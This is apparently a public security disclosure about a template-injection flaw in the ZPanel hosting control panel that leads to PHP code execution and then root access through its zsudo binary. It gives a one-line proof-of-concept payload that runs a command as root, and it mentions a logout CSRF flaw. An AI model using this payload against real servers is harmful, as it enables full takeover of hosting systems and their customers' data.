There's an arbitrary (PHP) code execution in ZPanel, a free and open-source shared hosting control panel. Using the included zsudo binary, access can be escalated and commands can be run as root.
The vulnerability: ZPanel uses a poor "templater" system that basically consists of a few str_replace calls and an eval... and as could be expected from something like this, it does a very poor job at preventing malicious code. The relevant code can be seen here: https://github.com/bobsta63/zpanelx/blob/master/dryden/ui/templateparser.class.php (note the poor attempt at stripping out <?php and ?> tags).
By effectively injecting the replacement that occurs in line 71, one can run arbitrary PHP code. When combined with ZPanels
zsudobinary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments (aside from the path to the to-be-executed-command).The scope: Custom templates/themes can be uploaded by resellers and administrators. This effectively means that anyone that can get access to a reseller account through any means, including by purchasing a reseller service from a ZPanel-using host, can gain root access, without detection.
PoC: Insert the following code anywhere in master.ztml or any other template that is parsed by the template parser, replacing
touch derpwith any command of choice:
<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo $value['bogus &>
I've posted the full post to the full-disclosure mailinglist: http://seclists.org/fulldisclosure/2013/Apr/28
Seriously, guys. Stop using ZPanel. It's terribly insecure. How many times do I have to say this?
Bonus: there's a CSRF vulnerability in the logout mechanism.